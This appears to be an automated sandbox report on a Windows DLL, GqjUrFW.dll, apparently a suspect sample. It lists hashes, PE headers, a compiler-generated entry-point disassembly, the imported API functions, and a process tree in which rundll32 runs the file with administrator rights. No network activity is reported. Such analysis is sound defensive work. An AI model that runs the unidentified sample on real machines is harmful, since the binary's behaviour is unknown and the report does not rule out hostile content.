SSDEEP:98304:Fw5fRmhQ1orSk3GCK4J7vADNR6oXc0/8+x0bRtI4PPgbYhiLC9kEN6+/mu:ifiQ15M2aIDS0i+SRi4samC9bN9O
TLSH:386613186210C025F8864276F47851FE8064B93857E51AD7F7882A4D8FBD9E9EF3A733
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1}T:u.:iu.:iu.:ixN.ik.:ixN.i1.:ixN.i..:i...ix.:iu.;i..:i...is.:i...io.:i...it.:i...it.:iRichu.:i................PE..L.....>a...
Icon Hash:7ae282899bbab082
Entrypoint:0x10067d87
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:NX_COMPAT
Time Stamp:0x613E19C8 [Sun Sep 12 15:16:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:7cd74f7474e981fda0ae7dfc861e61cb
Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F75C4DBF9B7h
call 00007F75C4DCB721h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F75C4DBF9BCh
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 10082DA8h
call 00007F75C4DC4CEFh
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F75C4DBF9BEh
cmp dword ptr [11180280h], esi
je 00007F75C4DBFA9Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F75C4DBF9B7h
cmp esi, 02h
jne 00007F75C4DBF9E7h
mov ecx, dword ptr [10002718h]
test ecx, ecx
je 00007F75C4DBF9BEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F75C4DBFA67h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F75C4DBF7C6h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F75C4DBFA50h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F75C4DCB736h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F75C4DBF9DAh
test edi, edi
jne 00007F75C4DBF9D6h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F75C4DCB71Eh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F75C4DBF78Ch
mov eax, dword ptr [10002718h]
test eax, eax
je 00007F75C4DBF9B9h
push ebx
push edi
push dword ptr [ebp+08h]
call eax
Programming Language:
  • [ASM] VS2013 build 21005
  • [C++] VS2013 build 21005
  • [ C ] VS2013 build 21005
  • [C++] VS2013 UPD5 build 40629
  • [EXP] VS2013 UPD5 build 40629
  • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x83380 | 0x41 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11832bc | 0x8c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1185000 | 0x2f90 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x7cb8 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1183000 | 0x2bc | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x823c1 | 0x82400 | 66301598685edbb3fd66c30e8b1db7da | False | 0.4785399922024952 | data | 6.377564474165297 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x84000 | 0x10fe38c | 0x5ec000 | 6f79645103290c185d5fcb439532d4d4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1183000 | 0x11fc | 0x1200 | fa58ed40493dd2cb75a414c9cbc5d8a5 | False | 0.4676649305555556 | data | 5.690357837366671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1185000 | 0x2f90 | 0x3000 | bd03a48314f3769efdd0abd3bfac8a0d | False | 0.7286783854166666 | data | 6.540267631837761 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetModuleFileNameW, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, GetFileType, GetStdHandle, GetOEMCP, GetACP, IsValidCodePage, SetFilePointerEx, GetSystemDefaultUILanguage, GetModuleHandleExW, ExitProcess, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, GetStartupInfoW, TlsFree, LoadLibraryExW, OutputDebugStringW, SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, SuspendThread, GetVersion, IsDebuggerPresent, GetThreadPriority, DeviceIoControl, VirtualAlloc, HeapDestroy, FormatMessageW, GetLogicalDrives, CreateDirectoryW, VerSetConditionMask, SystemTimeToTzSpecificLocalTime, GetProcessHeap, SetErrorMode, SystemTimeToFileTime, EnumResourceNamesW, GetFullPathNameW, EnumCalendarInfoW, lstrcpyW, GetExitCodeThread, SizeofResource, HeapSize, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, Sleep, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapReAlloc, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, HeapFree, GetCommandLineA, GetCurrentThreadId, GetCPInfo, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount
USER32.dll | ShowOwnedPopups, DestroyWindow, SetCursor, GetDlgItemInt, SetTimer, SetKeyboardState, SetCapture, RemovePropA, GetClientRect, BeginPaint, WaitMessage, GetCapture, ShowCursor, OffsetRect, LoadMenuW, GetWindowLongW, UnregisterClassA, GetWindowLongA, GetWindowTextW, CreateMenu, SendDlgItemMessageW, GetSysColor, EnumChildWindows, AppendMenuA, GetMenuItemCount, GetKeyboardType, CheckRadioButton, GetSystemMetrics, EnableWindow, GetDlgCtrlID, GetDlgItemTextA, GetCaretBlinkTime, SetMenuItemInfoW, GetMonitorInfoW, RegisterClassA, EndPaint, RegisterWindowMessageW, DrawTextExW, GetMenu, GetSystemMenu, CharUpperBuffW, CreateDialogParamA, GetWindowTextLengthA, GetDoubleClickTime, GetDC, GetDesktopWindow, GetClassNameW
GDI32.dll | GetTextExtentPoint32W, PatBlt, GetCharacterPlacementW, CreateFontIndirectA, SelectObject, CreateCompatibleDC, SaveDC, GetCurrentPositionEx, GetTextExtentExPointA, GetCharWidth32A, SetTextAlign, GetPixel, ExtTextOutA, CreateSolidBrush, SetBkColor, CreateBitmap, GetSystemPaletteEntries, BitBlt, CreateFontIndirectW, GdiFlush, SelectClipRgn, GetStockObject, ExtCreatePen
ADVAPI32.dll | GetLengthSid, RegLoadKeyW, AllocateAndInitializeSid, QueryServiceStatus, RegQueryInfoKeyW, CopySid, OpenSCManagerW
SHELL32.dll | ExtractIconExW, SHGetFileInfoW
OLEAUT32.dll | VariantChangeType, SysAllocStringLen, VariantInit
No network behavior found
Target ID:0
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll"
Imagebase:0x40000
File size:126'464 bytes
MD5 hash:51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:1
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:15:58:56
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:15:58:59
Start date:31/08/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Imagebase:0x5d0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

No disassembly